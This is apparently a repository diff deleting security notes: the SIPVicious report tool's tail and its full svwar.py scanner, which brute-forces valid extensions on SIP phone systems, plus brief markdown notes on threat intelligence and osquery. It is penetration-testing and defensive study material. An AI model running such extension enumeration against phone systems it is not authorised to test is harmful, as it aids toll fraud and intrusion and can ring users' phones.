usage = "%prog [command] [options]\r\n\r\n"
usage += commandsusage
parser = OptionParser(usage=usage, version="%prog v" + str(__version__) + __GPL__)
parser.add_option('-v', '--verbose', dest="verbose", action="count",
help="Increase verbosity")
parser.add_option('-q', '--quiet', dest="quiet", action="store_true",
default=False, help="Quiet mode")
parser.add_option("-t", "--type", dest="sessiontype",
help="Type of session. This is usually either svmap, svwar or svcrack. If not set I will try to find the best match")
parser.add_option("-s", "--session", dest="session",
help="Name of the session")
parser.add_option("-f", "--format", dest="format",
help="Format type. Can be stdout, pdf, xml, csv or txt")
parser.add_option("-o", "--output", dest="outputfile",
help="Output filename")
parser.add_option("-n", dest="resolve", default=True,
action="store_false", help="Do not resolve the ip address")
parser.add_option("-c", "--count", dest="count", default=False,
action="store_true", help="Used togather with 'list' command to count the number of entries")
options, args = parser.parse_args()
if len(args) < 1:
parser.error("Please specify a command.\r\n")
exit(1)
command = args[0]
validcommands = ['list', 'export', 'delete', 'stats', 'search']
if command not in validcommands:
parser.error('%s is not a supported command' % command)
exit(1)
logging.basicConfig(level=calcloglevel(options))
sessiontypes = ['svmap', 'svwar', 'svcrack']
if options.sessiontype not in sessiontypes:
parser.error("Invalid session type. Please specify a valid session type.")
exit(1)
logging.debug('started logging')
if command == 'list':
listsessions(options.sessiontype, count=options.count)
if command == 'delete':
if options.session is None:
parser.error("Please specify a valid session.")
exit(1)
sessionpath = deletesessions(options.session, options.sessiontype)
if sessionpath is None:
parser.error(
'Session could not be found. Make sure it exists by making use of %s.py list' % __prog__)
exit(1)
elif command == 'export':
start_time = datetime.now()
if options.session is None:
parser.error("Please specify a valid session")
exit(1)
if options.outputfile is None and options.format not in [None, 'stdout']:
parser.error("Please specify an output file")
exit(1)
tmp = getsessionpath(options.session, options.sessiontype)
if tmp is None:
parser.error(
'Session could not be found. Make sure it exists by making use of %s list' % __prog__)
exit(1)
sessionpath, sessiontype = tmp
resdb = None
if sessiontype == 'svmap':
dbloc = os.path.join(sessionpath, 'resultua')
labels = ['Host', 'User Agent']
elif sessiontype == 'svwar':
dbloc = os.path.join(sessionpath, 'resultauth')
labels = ['Extension', 'Authentication']
elif sessiontype == 'svcrack':
dbloc = os.path.join(sessionpath, 'resultpasswd')
labels = ['Extension', 'Password']
if not dbexists(dbloc):
logging.error('The database could not be found: %s' % dbloc)
exit(1)
db = dbm.open(dbloc, 'r')
if options.resolve and sessiontype == 'svmap':
labels.append('Resolved')
resdbloc = os.path.join(sessionpath, 'resolved')
if not dbexists(resdbloc):
logging.info('Performing DNS reverse lookup')
resdb = dbm.open(resdbloc, 'c')
createReverseLookup(db, resdb)
else:
logging.info('Not Performing DNS lookup')
resdb = dbm.open(resdbloc, 'r')
if options.outputfile is not None:
if options.outputfile.find('.') < 0:
if options.format is None:
options.format = 'txt'
options.outputfile += '.%s' % options.format
if options.format in [None, 'stdout', 'txt']:
o = getasciitable(labels, db, resdb)
if options.outputfile is None:
print(o)
else:
open(options.outputfile, 'w').write(o)
elif options.format == 'xml':
o = outputtoxml('%s report' % sessiontype, labels, db, resdb)
open(options.outputfile, 'w').write(o)
elif options.format == 'pdf':
outputtopdf(options.outputfile, '%s report' %
sessiontype, labels, db, resdb)
elif options.format == 'csv':
writer = csv.writer(open(options.outputfile, "w"))
for k in db.keys():
row = [k.decode(), db[k].decode()]
if resdb is not None:
if k in resdb:
row.append(resdb[k].decode())
else:
row.append('N/A')
writer.writerow(row)
logging.info("That took %s" % (datetime.now() - start_time))
elif command == 'stats':
if options.session is None:
parser.error("Please specify a valid session")
exit(1)
if options.outputfile is None and options.format not in [None, 'stdout']:
parser.error("Please specify an output file")
exit(1)
tmp = getsessionpath(options.session, options.sessiontype)
if tmp is None:
parser.error(
'Session could not be found. Make sure it exists by making use of %s list' % __prog__)
exit(1)
sessionpath, sessiontype = tmp
if sessiontype != 'svmap':
parser.error('Only takes svmap sessions for now')
exit(1)
dbloc = os.path.join(sessionpath, 'resultua')
if not dbexists(dbloc):
logging.error('The database could not be found: %s' % dbloc)
exit(1)
db = dbm.open(dbloc, 'r')
useragents = dict()
useragentconames = dict()
for k in db.keys():
v = db[k]
if v not in useragents:
useragents[v] = 0
useragents[v] += 1
useragentconame = re.split(b'[ /]', v)[0]
if useragentconame not in useragentconames:
useragentconames[useragentconame] = 0
useragentconames[useragentconame] += 1
_useragents = sorted(iter(useragents.items()),
key=itemgetter(1), reverse=True)
suseragents = list(map(lambda x: '\t- %s (%s)' % (x[0].decode(), x[1]), _useragents))
_useragentsnames = sorted(
iter(useragentconames.items()), key=itemgetter(1), reverse=True)
suseragentsnames = list(map(lambda x: '\t- %s (%s)' %
(x[0].decode(), x[1]), _useragentsnames))
print("Total number of SIP devices found: %s" % len(list(db.keys())))
print("Total number of useragents: %s\r\n" % len(suseragents))
print("Total number of useragent names: %s\r\n" % len(suseragentsnames))
print("Most popular top 30 useragents:\r\n")
print('\r\n'.join(suseragents[:30]), '\r\n\r\n')
print("Most unpopular top 30 useragents:\r\n\t")
print('\r\n'.join(suseragents[-30:]), "\r\n\r\n")
print("Most popular top 30 useragent names:\r\n")
print('\r\n'.join(suseragentsnames[:30]), '\r\n\r\n')
print("Most unpopular top 30 useragent names:\r\n\t")
print('\r\n'.join(suseragentsnames[-30:]), '\r\n\r\n')
elif command == 'search':
if options.session is None:
parser.error("Please specify a valid session")
exit(1)
if len(args) < 2:
parser.error('You need to specify a search string')
searchstring = args[1]
tmp = getsessionpath(options.session, options.sessiontype)
if tmp is None:
parser.error(
'Session could not be found. Make sure it exists by making use of %s list' % __prog__)
exit(1)
sessionpath, sessiontype = tmp
if sessiontype != 'svmap':
parser.error('Only takes svmap sessions for now')
exit(1)
dbloc = os.path.join(sessionpath, 'resultua')
if not dbexists(dbloc):
logging.error('The database could not be found: %s' % dbloc)
exit(1)
db = dbm.open(dbloc, 'r')
useragents = dict()
useragentconames = dict()
labels = ['Host', 'User Agent']
for k in db.keys():
v = db[k].decode()
if searchstring.lower() in v.lower():
print(k.decode() + '\t' + v)
if __name__ == "__main__":
main()

746
misc/telecommunications/sipvicious/sipvicious/svwar.py
View File

@ -1,746 +0,0 @@
# svwar.py - SIPvicious extension line scanner
__GPL__ = """
Sipvicious extension line scanner scans SIP PaBXs for valid extension lines
Copyright (C) 2007-2021 Sandro Gauci <sandro@enablesecurity.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import logging
import random
import select
import pickle
import socket
import sys
import time
import dbm
import os
from datetime import datetime
from urllib.parse import urlparse
from sipvicious.libs.pptable import to_string
from sipvicious.libs.svhelper import (
__version__, numericbrute, dictionaryattack, mysendto,
createTag, check_ipv6, makeRequest, getTag, parseHeader, resolveexitcode,
getRealm, standardoptions, standardscanneroptions, calcloglevel,
resumeFrom, getRange, reportBugToAuthor, packetcounter, ArgumentParser
)
__prog__ = 'svwar'
__exitcode__ = 0
class TakeASip:
def __init__(self, host='localhost', bindingip='', externalip=None, localport=5060,
method='REGISTER', guessmode=1, guessargs=None, selecttime=0.005,
sessionpath=None, compact=False, socktimeout=3, initialcheck=True,
enableack=False, maxlastrecvtime=15, domain=None, printdebug=False,
ipv6=False, port=5060):
self.log = logging.getLogger('TakeASip')
self.maxlastrecvtime = maxlastrecvtime
self.sessionpath = sessionpath
self.dbsyncs = False
self.enableack = enableack
if self.sessionpath is not None:
self.resultauth = dbm.open(os.path.join(
self.sessionpath, 'resultauth'), 'c')
try:
self.resultauth.sync()
self.dbsyncs = True
self.log.info("Db does sync")
except AttributeError:
self.log.info("Db does not sync")
pass
else:
self.resultauth = dict()
family = socket.AF_INET
if ipv6:
family = socket.AF_INET6
self.sock = socket.socket(family, socket.SOCK_DGRAM)
self.sock.settimeout(socktimeout)
self.bindingip = bindingip
self.localport = localport
self.ipv6 = ipv6
self.originallocalport = localport
self.rlist = [self.sock]
self.wlist = list()
self.xlist = list()
self.challenges = list()
self.realm = None
try:
if int(port) >= 1 and int(port) <= 65535:
self.dsthost, self.dstport = host, int(port)
else:
raise ValueError
except (ValueError, TypeError):
self.log.error('port should strictly be an integer between 1 and 65535')
exit(10)
self.domain = self.dsthost
if domain:
self.domain = domain
self.guessmode = guessmode
self.guessargs = guessargs
if self.guessmode == 1:
self.usernamegen = numericbrute(*self.guessargs)
elif guessmode == 2:
self.usernamegen = dictionaryattack(self.guessargs)
self.selecttime = selecttime
self.compact = compact
self.nomore = False
self.BADUSER = None
self.method = method.upper()
if self.method == 'INVITE':
self.log.warning(
'using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night')
if self.sessionpath is not None:
self.packetcount = packetcounter(50)
self.initialcheck = initialcheck
self.lastrecvtime = time.time()
if externalip is None:
self.log.debug("external ip was not set")
if (self.bindingip != '0.0.0.0') and (len(self.bindingip) > 0):
self.log.debug(
"but bindingip was set! we'll set it to the binding ip")
self.externalip = self.bindingip
else:
try:
self.log.info(
"trying to get self ip .. might take a while")
self.externalip = socket.gethostbyname(
socket.gethostname())
except socket.error:
self.externalip = '127.0.0.1'
else:
self.log.debug("external ip was set")
self.externalip = externalip
self.printdebug = printdebug
# SIP response codes, also mapped to ISDN Q.931 disconnect causes.
PROXYAUTHREQ = 'SIP/2.0 407 '
AUTHREQ = 'SIP/2.0 401 '
OKEY = 'SIP/2.0 200 '
NOTFOUND = 'SIP/2.0 404 '
INVALIDPASS = 'SIP/2.0 403 '
TRYING = 'SIP/2.0 100 '
RINGING = 'SIP/2.0 180 '
NOTALLOWED = 'SIP/2.0 405 '
UNAVAILABLE = 'SIP/2.0 480 '
DECLINED = 'SIP/2.0 603 '
INEXISTENTTRANSACTION = 'SIP/2.0 481'
# Mapped to ISDN Q.931 codes - 88 (Incompatible destination), 95 (Invalid message), 111 (Protocol error)
# If we get something like this, then most probably the remote device SIP stack has troubles with
# understanding / parsing our messages (a.k.a. interopability problems).
BADREQUEST = 'SIP/2.0 400 '
# Mapped to ISDN Q.931 codes - 34 (No circuit available), 38 (Network out of order), 41 (Temporary failure),
# 42 (Switching equipment congestion), 47 (Resource unavailable)
# Should be handled in the very same way as SIP response code 404 - the prefix is not correct and we should
# try with the next one.
SERVICEUN = 'SIP/2.0 503 '
def createRequest(self, m, username=None, auth=None, cid=None,
cseq=1, fromaddr=None, toaddr=None, contact=None):
if cid is None:
cid = '%s' % str(random.getrandbits(32))
branchunique = '%s' % random.getrandbits(32)
localtag = createTag(username)
domain = self.domain
if self.ipv6 and check_ipv6(domain):
domain = '[' + self.domain + ']'
if not contact:
contact = 'sip:%s@%s' % (username, domain)
if not fromaddr:
fromaddr = '"%s"<sip:%s@%s>' % (username, username, domain)
if not toaddr:
toaddr = '"%s"<sip:%s@%s>' % (username, username, domain)
request = makeRequest(
m,
fromaddr,
toaddr,
domain,
self.dstport,
cid,
self.externalip,
branchunique,
cseq,
auth,
localtag,
self.compact,
contact=contact,
localport=self.localport,
extension=username
)
return request
def getResponse(self):
# we got stuff to read off the socket
global __exitcode__
buff, srcaddr = self.sock.recvfrom(8192)
if self.printdebug:
print(srcaddr)
print(buff)
buff = buff.decode('utf-8')
try:
extension = getTag(buff).decode('utf-8', 'ignore')
except (TypeError, AttributeError):
self.log.error('could not decode to tag')
__exitcode__ = resolveexitcode(20, __exitcode__)
extension = None
if extension is None:
self.nomore = True
return
try:
firstline = buff.splitlines()[0]
except (ValueError, IndexError, AttributeError):
self.log.error("could not get the 1st line")
__exitcode__ = resolveexitcode(20, __exitcode__)
return
if self.enableack:
# send an ack to any responses which match
_tmp = parseHeader(buff)
if not (_tmp and 'code' in _tmp):
return
if 699 > _tmp['code'] >= 200:
self.log.debug('will try to send an ACK response')
if 'headers' not in _tmp:
self.log.debug('no headers?')
__exitcode__ = resolveexitcode(20, __exitcode__)
return
if 'from' not in _tmp['headers']:
self.log.debug('no from?')
__exitcode__ = resolveexitcode(20, __exitcode__)
return
if 'cseq' not in _tmp['headers']:
self.log.debug('no cseq')
__exitcode__ = resolveexitcode(20, __exitcode__)
return
if 'call-id' not in _tmp['headers']:
self.log.debug('no caller id')
__exitcode__ = resolveexitcode(20, __exitcode__)
return
try:
# _tmp['headers']['from'][0].split('"')[1]
getTag(buff)
except IndexError:
self.log.warning('could not parse the from address %s' % _tmp['headers']['from'])
__exitcode__ = resolveexitcode(20, __exitcode__)
cseq = _tmp['headers']['cseq'][0]
cseqmethod = cseq.split()[1]
if 'INVITE' == cseqmethod:
cid = _tmp['headers']['call-id'][0]
fromaddr = _tmp['headers']['from'][0]
toaddr = _tmp['headers']['to'][0]
ackreq = self.createRequest(
'ACK',
cid=cid,
cseq=cseq.replace(cseqmethod, ''),
fromaddr=fromaddr,
toaddr=toaddr,
)
self.log.debug('here is your ack request: %s' % ackreq)
mysendto(self.sock, ackreq, (self.dsthost, self.dstport))
# self.sock.sendto(ackreq,(self.dsthost,self.dstport))
if _tmp['code'] == 200:
byemsg = self.createRequest(
'BYE',
cid=cid,
cseq='2',
fromaddr=fromaddr,
toaddr=toaddr,
)
self.log.debug('sending a BYE to the 200 OK for the INVITE')
mysendto(self.sock, byemsg,(self.dsthost, self.dstport))
if firstline != self.BADUSER:
__exitcode__ = resolveexitcode(40, __exitcode__)
if buff.startswith(self.PROXYAUTHREQ) \
or buff.startswith(self.INVALIDPASS) \
or buff.startswith(self.AUTHREQ):
if self.realm is None:
self.realm = getRealm(buff)
self.log.info("extension '%s' exists - requires authentication" % extension)
self.resultauth[extension] = 'reqauth'
if self.sessionpath is not None and self.dbsyncs:
self.resultauth.sync()
elif buff.startswith(self.TRYING):
pass
elif buff.startswith(self.RINGING):
pass
elif buff.startswith(self.OKEY):
self.log.info(
"extension '%s' exists - authentication not required" % extension)
self.resultauth[extension] = 'noauth'
if self.sessionpath is not None and self.dbsyncs:
self.resultauth.sync()
else:
self.log.warning(
"extension '%s' probably exists but the response is unexpected" % extension)
self.log.debug("response: %s" % firstline)
self.resultauth[extension] = 'weird'
if self.sessionpath is not None and self.dbsyncs:
self.resultauth.sync()
elif buff.startswith(self.NOTFOUND):
self.log.debug("User '%s' not found" % extension)
elif buff.startswith(self.INEXISTENTTRANSACTION):
pass
# Prefix not found, lets go to the next one. Should we add a warning
# here???
elif buff.startswith(self.SERVICEUN):
pass
elif buff.startswith(self.TRYING):
pass
elif buff.startswith(self.RINGING):
pass
elif buff.startswith(self.OKEY):
pass
elif buff.startswith(self.DECLINED):
pass
elif buff.startswith(self.NOTALLOWED):
self.log.warning("method not allowed")
self.nomore = True
elif buff.startswith(self.BADREQUEST):
self.log.error(
"Protocol / interopability error! The remote side most probably has problems with parsing your SIP messages!")
self.nomore = True
else:
self.log.warning("We got an unknown response")
self.log.error("Response: %s" % buff.__repr__())
self.log.debug("1st line: %s" % firstline.__repr__())
self.log.debug("Bad user: %s" % self.BADUSER.__repr__())
self.nomore = True
def start(self):
global __exitcode__
if self.bindingip == '':
bindingip = 'any'
else:
bindingip = self.bindingip
self.log.debug("binding to %s:%s" % (bindingip, self.localport))
while 1:
if self.localport > 65535:
self.log.critical("Could not bind to any port")
__exitcode__ = resolveexitcode(30, __exitcode__)
return
try:
self.sock.bind((self.bindingip, self.localport))
break
except socket.error:
self.log.debug("could not bind to %s" % self.localport)
self.localport += 1
if self.originallocalport != self.localport:
self.log.warning("could not bind to %s:%s - some process might already be listening on this port. Listening on port %s instead" %
(self.bindingip, self.originallocalport, self.localport))
self.log.info(
"Make use of the -P option to specify a port to bind to yourself")
# perform a test 1st .. we want to see if we get a 404
# some other error for unknown users
self.nextuser = random.getrandbits(32)
data = self.createRequest(self.method, self.nextuser)
try:
mysendto(self.sock, data, (self.dsthost, self.dstport))
# self.sock.sendto(data,(self.dsthost,self.dstport))
except socket.error as err:
self.log.error("socket error: %s" % err)
__exitcode__ = resolveexitcode(30, __exitcode__)
return
# first we identify the assumed reply for an unknown extension
gotbadresponse = False
try:
while 1:
try:
buff, srcaddr = self.sock.recvfrom(8192)
if self.printdebug:
print(srcaddr)
print(buff)
except socket.error as err:
self.log.error("socket error: %s" % err)
__exitcode__ = resolveexitcode(30, __exitcode__)
return
buff = buff.decode('utf-8', 'ignore')
if buff.startswith(self.TRYING) \
or buff.startswith(self.RINGING) \
or buff.startswith(self.UNAVAILABLE):
gotbadresponse = True
elif (buff.startswith(self.PROXYAUTHREQ)
or buff.startswith(self.INVALIDPASS)
or buff.startswith(self.AUTHREQ)) \
and self.initialcheck:
self.log.error(
"SIP server replied with an authentication request for an unknown extension. Set --force to force a scan.")
return
else:
self.BADUSER = buff.splitlines()[0]
self.log.debug("Bad user = %s" % self.BADUSER)
gotbadresponse = False
break
except socket.timeout:
if gotbadresponse:
self.log.error("The response we got was not good: %s" % buff.__repr__())
else:
self.log.error("No server response - are you sure that this PBX is listening? run svmap against it to find out")
__exitcode__ = resolveexitcode(30, __exitcode__)
return
except (AttributeError, ValueError, IndexError):
self.log.error("bad response .. bailing out")
return
except socket.error as err:
self.log.error("socket error: %s" % err)
__exitcode__ = resolveexitcode(30, __exitcode__)
return
if self.BADUSER.startswith(self.AUTHREQ):
self.log.warning(
"Bad user = %s - svwar will probably not work!" % self.AUTHREQ)
# let the fun commence
self.log.info('Ok SIP device found')
while 1:
if self.nomore:
while 1:
try:
self.getResponse()
except socket.timeout:
return
r, _, _ = select.select(
self.rlist,
self.wlist,
self.xlist,
self.selecttime
)
if r:
# we got stuff to read off the socket
self.getResponse()
self.lastrecvtime = time.time()
else:
# check if its been a while since we had a response to prevent
# flooding - otherwise stop
timediff = time.time() - self.lastrecvtime
if timediff > self.maxlastrecvtime:
self.nomore = True
self.log.warning(
'It has been %s seconds since we last received a response - stopping' % timediff)
__exitcode__ = resolveexitcode(30, __exitcode__)
continue
# no stuff to read .. its our turn to send back something
try:
self.nextuser = next(self.usernamegen)
except StopIteration:
self.nomore = True
continue
except TypeError:
self.nomore = True
self.log.exception('Bad format string')
__exitcode__ = resolveexitcode(20, __exitcode__)
data = self.createRequest(self.method, self.nextuser)
try:
self.log.debug("sending request for %s" % self.nextuser)
mysendto(self.sock, data, (self.dsthost, self.dstport))
# self.sock.sendto(data,(self.dsthost,self.dstport))
if self.sessionpath is not None:
if next(self.packetcount):
try:
if self.guessmode == 1:
pickle.dump(self.nextuser, open(os.path.join(
self.sessionpath, 'lastextension.pkl'), 'wb+'))
self.log.debug(
'logged last extension %s' % self.nextuser)
elif self.guessmode == 2:
pickle.dump(self.guessargs.tell(), open(
os.path.join(self.sessionpath, 'lastextension.pkl'), 'wb+'))
self.log.debug('logged last position %s' % self.guessargs.tell())
except IOError:
self.log.warning('could not log the last extension scanned')
__exitcode__ = resolveexitcode(20, __exitcode__)
except socket.error as err:
__exitcode__ = resolveexitcode(30, __exitcode__)
self.log.error("socket error: %s" % err)
break
def main():
global __exitcode__
usage = "usage: %prog [options] target\r\n"
usage += "examples:\r\n"
usage += "%prog -e100-999 udp://10.0.0.1:5080\r\n"
usage += "%prog -d dictionary.txt 10.0.0.2\r\n"
parser = ArgumentParser(usage, version="%prog v" + str(__version__) + __GPL__)
parser.add_option("-p", "--port", dest="port", default="5060",
help="Destination port of the SIP device - eg -p 5060", metavar="PORT")
parser = standardoptions(parser)
parser = standardscanneroptions(parser)
parser.add_option("-d", "--dictionary", dest="dictionary", type="string", metavar="DICTIONARY",
help="specify a dictionary file with possible extension names or - for stdin")
parser.add_option("-m", "--method", dest="method", type="string",
help="specify a request method. The default is REGISTER. Other possible methods are OPTIONS and INVITE",
default="REGISTER", metavar="OPTIONS")
parser.add_option("-e", "--extensions", dest="range", default='100-999',
help="specify an extension or extension range\r\nexample: -e 100-999,1000-1500,9999",
metavar="RANGE")
parser.add_option("-z", "--zeropadding", dest="zeropadding", type="int",
help="the number of zeros used to padd the username." \
"the options \"-e 1-9999 -z 4\" would give 0001 0002 0003 ... 9999",
default=0, metavar="PADDING")
parser.add_option('--force', dest="force", action="store_true",
default=False, help="Force scan, ignoring initial sanity checks.")
parser.add_option('--template', '-T', action="store", dest="template",
help="A format string which allows us to specify a template for the extensions. " \
"example svwar.py -e 1-999 --template=\"123%#04i999\" would scan between 1230001999 to 1230999999\"")
parser.add_option('--enabledefaults', '-D', action="store_true", dest="defaults",
default=False, help="Scan for default / typical extensions such as " \
"1000,2000,3000 ... 1100, etc. This option is off by default." \
"Use --enabledefaults to enable this functionality")
parser.add_option('--maximumtime', action='store', dest='maximumtime', type="int",
default=10, help="Maximum time in seconds to keep sending requests without receiving a response back")
parser.add_option('--domain', dest="domain",
help="force a specific domain name for the SIP message, eg. -d example.org")
parser.add_option("--debug", dest="printdebug",
help="Print SIP messages received", default=False, action="store_true")
parser.add_option('-6', dest="ipv6", action="store_true", help="scan an IPv6 address")
options, args = parser.parse_args()
exportpath = None
logging.basicConfig(level=calcloglevel(options))
logging.debug('started logging')
if options.force:
initialcheck = False
else:
initialcheck = True
if options.template is not None:
try:
options.template % 1
except TypeError:
parser.error("The format string template is not correct. Please provide an appropiate one", 10)
if options.resume is not None:
exportpath = os.path.join(os.path.expanduser(
'~'), '.sipvicious', __prog__, options.resume)
if os.path.exists(os.path.join(exportpath, 'closed')):
parser.error("Cannot resume a session that is complete", 20)
if not os.path.exists(exportpath):
parser.error('A session with the name %s was not found' % options.resume, 20)
optionssrc = os.path.join(exportpath, 'options.pkl')
previousresume = options.resume
previousverbose = options.verbose
options, args = pickle.load(open(optionssrc, 'rb'), encoding='bytes')
options.resume = previousresume
options.verbose = previousverbose
elif options.save is not None:
exportpath = os.path.join(os.path.expanduser(
'~'), '.sipvicious', __prog__, options.save)
if len(args) < 1:
parser.error("Please provide at least one hostname which talks SIP!", 10)
elif len(args) > 1:
parser.error("Currently svwar supports exactly one hostname.", 10)
destport = options.port
parsed = urlparse(args[0])
if not parsed.scheme:
host = args[0]
else:
if any(parsed.scheme == i for i in ('tcp', 'tls', 'ws', 'wss')):
parser.error('Protocol scheme %s is not supported in SIPVicious OSS' % parsed.scheme, 20)
if parsed.scheme != 'udp':
parser.error('Invalid protocol scheme: %s' % parsed.scheme, 20)
if ':' not in parsed.netloc:
parser.error('You have to supply hosts in format of scheme://host:port when using newer convention.', 10)
if int(destport) != 5060:
parser.error('You cannot supply additional -p when already including a port in URI. Please use only one.', 20)
host = parsed.netloc.split(':')[0]
destport = parsed.netloc.split(':')[1]
if options.dictionary is not None:
guessmode = 2
if options.dictionary == "-":
dictionary = sys.stdin
else:
try:
dictionary = open(options.dictionary, 'r', encoding='utf-8', errors='ignore')
except IOError:
parser.error("could not open %s" % options.dictionary, 20)
if options.resume is not None:
lastextensionsrc = os.path.join(exportpath, 'lastextension.pkl')
previousposition = pickle.load(open(lastextensionsrc, 'rb'), encoding='bytes')
dictionary.seek(previousposition)
guessargs = dictionary
else:
guessmode = 1
if options.resume is not None:
lastextensionsrc = os.path.join(exportpath, 'lastextension.pkl')
try:
previousextension = pickle.load(open(lastextensionsrc, 'rb'), encoding='bytes')
except IOError:
parser.error('Could not read from %s' % lastextensionsrc, 20)
logging.debug('Previous range: %s' % options.range)
options.range = resumeFrom(previousextension, options.range)
logging.debug('New range: %s' % options.range)
logging.info('Resuming from %s' % previousextension)
extensionstotry = getRange(options.range)
guessargs = (extensionstotry, options.zeropadding, options.template, options.defaults)
if options.save is not None:
if options.resume is None:
exportpath = os.path.join(os.path.expanduser(
'~'), '.sipvicious', __prog__, options.save)
if os.path.exists(exportpath):
parser.error('we found a previous scan with the same name. Please choose a new session name', 20)
logging.debug('creating an export location %s' % exportpath)
try:
os.makedirs(exportpath, mode=0o700)
except OSError:
parser.error('could not create the export location %s' % exportpath, 20)
optionsdst = os.path.join(exportpath, 'options.pkl')
logging.debug('saving options to %s' % optionsdst)
pickle.dump([options, args], open(optionsdst, 'wb+'))
if options.autogetip:
tmpsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmpsocket.connect(("msn.com", 80))
options.externalip = tmpsocket.getsockname()[0]
tmpsocket.close()
enableack = False
if options.method.upper() == 'INVITE':
enableack = True
sipvicious = TakeASip(
host,
port=destport,
selecttime=options.selecttime,
method=options.method,
compact=options.enablecompact,
guessmode=guessmode,
guessargs=guessargs,
sessionpath=exportpath,
initialcheck=initialcheck,
externalip=options.externalip,
enableack=enableack,
maxlastrecvtime=options.maximumtime,
localport=options.localport,
domain=options.domain,
printdebug=options.printdebug,
ipv6=options.ipv6,
)
start_time = datetime.now()
logging.info("scan started at %s" % str(start_time))
logging.info("start your engines")
try:
sipvicious.start()
if exportpath is not None:
open(os.path.join(exportpath, 'closed'), 'w').close()
except KeyboardInterrupt:
logging.warning('caught your control^c - quiting')
except Exception as err:
logging.critical(
"Got unhandled exception : %s", err.__str__())
reportBugToAuthor(err)
if options.save is not None and sipvicious.nextuser is not None:
lastextensiondst = os.path.join(exportpath, 'lastextension.pkl')
logging.debug('saving state to %s' % lastextensiondst)
try:
if guessmode == 1:
pickle.dump(sipvicious.nextuser, open(
os.path.join(exportpath, 'lastextension.pkl'), 'wb'))
logging.debug('logged last extension %s' % sipvicious.nextuser)
elif guessmode == 2:
pickle.dump(sipvicious.guessargs.tell(), open(
os.path.join(exportpath, 'lastextension.pkl'), 'wb'))
logging.debug('logged last position %s' % sipvicious.guessargs.tell())
except IOError:
logging.warning('could not log the last extension scanned')
__exitcode__ = resolveexitcode(20, __exitcode__)
# display results
if not options.quiet:
lenres = len(sipvicious.resultauth)
if lenres > 0:
logging.info("we have %s extensions" % lenres)
if (lenres < 400 and options.save is not None) or options.save is None:
labels = ('Extension', 'Authentication')
rows = list()
try:
for k in sipvicious.resultauth.keys():
rows.append((k.decode(), sipvicious.resultauth[k].decode()))
except AttributeError:
for k in sipvicious.resultauth.keys():
rows.append((k, sipvicious.resultauth[k]))
print(to_string(rows, header=labels))
else:
logging.warning("too many to print - use svreport for this")
else:
logging.warning("found nothing")
end_time = datetime.now()
total_time = end_time - start_time
logging.info("Total time: %s" % total_time)
sys.exit(__exitcode__)
if __name__ == '__main__':
main()

47
misc/threat_intelligence/isac.md
View File

@ -1,47 +0,0 @@
# Threat Intelligence
Data must be analyzed to be considered threat intelligence. Once analyzed and actionable, then it becomes threat intelligence. The data needs context around to become intel.
__Cyber Thread Intelligence (CTI)__ is a precautionary measure that companies use or contribute to so that other corporations do not get hit with the same attacks. Of course, adversaries change their TTPs all the time so the TI landscape is constantly changing.
Vendors and corporations will sometimes share their collected CTI in what are called __ISACs__ or __Information Sharing and Analysis Centers__. __ISACs__ collect various indicators of an adversary that other corporations can use as a precaution against adversaries.
Threat Intelligence is also broken up into three different types.
* Strategic
* Assist senior management make informed decisions specifically about the security budget and strategies.
* Tactical
* Interacts with the TTPs and attack models to identify adversary attack patterns.
* Operational
* Interact with IOCs and how the adversaries operationalize.
## Advance Persistent Threats (APTs)
* https://www.fireeye.com/current-threats/apt-groups.html
## TTP
TTP is an acronym for Tactics, Techniques, and Procedures, but what does each of these terms mean?
* The __Tactic__ is the adversary's goal or objective.
* The __Technique__ is how the adversary achieves the goal or objective.
* The __Procedure__ is how the technique is executed.
TI is an acronym for Threat Intelligence. Threat Intelligence is an overarching term for all collected information on adversaries and TTPs. You will also commonly hear CTI or Cyber Threat Intelligence which is just another way of saying Threat Intelligence.
## Indicator of Compromise
* __IOCs__ is an acronym for __Indicators of Compromise__, the indicators for malware and adversary groups. Indicators can include file hashes, IPs, names, etc.
## Information Sharing and Analysis Centers (ISACs)
According to the National Council of __ISACs__, "Information Sharing and Analysis Centers (ISACs) are member-driven organizations, delivering all-hazards threat and mitigation information to asset owners and operators". ISACs can be community-centered or vendor-specific. ISACs include CTI from threat actors as well as mitigation information in the form of IOCs, YARA rules, etc. ISACs maintain situational awareness by sharing and collaborating to maintain CTI, through a National Council of ISACs.
* ISACs
* [US-CERT](https://us-cert.cisa.gov/)
* [AlienVault OTX](https://otx.alienvault.com/)
* [ThreatConnect](https://threatconnect.com/)
* [MISP](https://www.misp-project.org/)

1
misc/threat_intelligence/loki.md
View File

@ -1 +0,0 @@
# Loki

88
misc/threat_intelligence/osquery.md
View File

@ -1,88 +0,0 @@
# Osquery
* [Documentation](https://osquery.readthedocs.io/en/stable/)
* [Schema Docs](https://osquery.io/schema/5.5.1/)
## Usage
* `osqueryi .help` is the overiew
### List available tables
List an overview of all available topics which can be queried.
```sh
.tables
```
* Specify via `.tables <tablename>`
### Show schema
```sh
.schema <table_name>
```
* Show schema for foreign operating systems via `--enable_foreign`
### Queries
* Select
```sql
select * from <table>;
select * <attr>,<attr> from <table>;
```
* UPDATE and DELETE is possible on run-time tables
* JOIN
```sql
SELECT pid, name, path FROM osquery_info JOIN processes USING (pid);
```
* Where
```sql
select * from programs where name = 'paint';
```
* Where clause operators
* `=` [equal]
* `<>` [not equal]
* `>, >=` [greater than, greater than or equal to]
* `<, <=` [less than or less than or equal to]
* `BETWEEN` [between a range]
* `LIKE` [pattern wildcard searches]
* `%` [wildcard, multiple characters]
* `_` [wildcard, one character]
* Matching wildcard rules
* `%`: Match all files and folders for one level.
* `%%`: Match all files and folders recursively.
* `%abc`: Match all within-level ending in "abc".
* `abc%`: Match all within-level starting with "abc".
* Table 'userassist' stores executed processes
## Modes
There are multiple modes to select from to show the data
```sh
osqueryi
osqueryi> .mode .help
```
## Remote Queries via Frontend
* [Repo](https://github.com/fleetdm/fleet.git)
## Extensions
* [osquery-extensions](https://github.com/trailofbits/osquery-extensions)
